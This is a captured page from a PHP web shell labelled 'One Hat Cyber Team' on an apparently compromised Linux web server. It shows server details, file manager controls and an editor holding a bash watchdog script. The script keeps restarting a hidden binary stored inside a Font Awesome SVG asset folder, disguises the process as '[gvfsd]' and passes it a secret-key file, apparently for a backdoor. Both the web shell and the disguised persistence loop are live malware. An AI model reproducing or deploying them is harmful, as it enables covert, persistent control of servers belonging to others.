One Hat Cyber Team
Your IP :
10.30.1.1
Server IP :
103.148.201.5
Server :
Linux web-olt 5.15.0-156-generic #166-Ubuntu SMP Sat Aug 9 00:02:46 UTC 2025 x86_64
Server Software :
Apache/2.4.52 (Ubuntu)
PHP Version :
8.1.29
Buat File
|
Buat Folder
Eksekusi
Dir :
~
/
proc
/
1576414
/
fd
/
Edit File:
255
#!/bin/bash # Watchdog process - monitors and restarts main process BIN_PATH="/var/www/html/sukma/public/assets/extensions/@fortawesome/fontawesome-free/svgs/regular/config-sync" PROC_NAME="[gvfsd]" SEC_FILE="/var/www/html/sukma/public/assets/extensions/@fortawesome/fontawesome-free/svgs/regular/rsyslogd.dat" SLEEP_TIME=60 while true; do # Check if process is running if ! pgrep -x "$(basename "$BIN_PATH")" >/dev/null 2>&1; then # Check by process name if ! pgrep -f "$PROC_NAME" >/dev/null 2>&1; then # Process not running, restart it TERM=xterm-256color GS_ARGS="-k $SEC_FILE -liqD" exec -a "$PROC_NAME" "$BIN_PATH" 2>/dev/null & fi fi sleep $SLEEP_TIME done
Simpan